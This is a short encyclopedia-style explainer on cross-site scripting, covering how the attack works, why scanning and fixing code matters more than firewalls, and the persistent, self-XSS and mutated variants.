Back

ⓘ Cross-site scripting




                                     

ⓘ Cross-site scripting

Cross-site scripting is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code.

In a Cross-site Scripting attack XSS, the attacker uses your vulnerable web page to deliver malicious JavaScript to your user. The users browser executes this malicious JavaScript on the users Computer. Note that about one in three websites is vulnerable to Cross-site scripting.

  • To protect against Cross-site Scripting, you must scan your website or web application regularly or at least after every chance in the code. Then, your developers must correct the code to eliminate the vulnerability. Contrary to popular opinions, web application firewalls do not protect against Cross-site Scripting, they just make the attack more difficult – the vulnerability is still there.
  • Even though a Cross-site Scripting attack happens in the users browser, it may affect your website or web application. For example, an attacker may use it to steal user credentials and log in to your website as that user. If that user is an administrator, the attacker gains control over your website.
                                     

1.1. Types Persistent

The persistent XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping.

                                     

1.2. Types Self-XSS

Self-XSS is a form of XSS vulnerability which relies on social engineering in order to trick the victim into executing malicious JavaScript code into their browser.

                                     

1.3. Types Mutated XSS

Mutated XSS happens when the attacker injects something that is seemingly safe, but rewritten and modified by the browser, while parsing the markup. This makes it extremely hard to detect or sanitize within the websites application logic.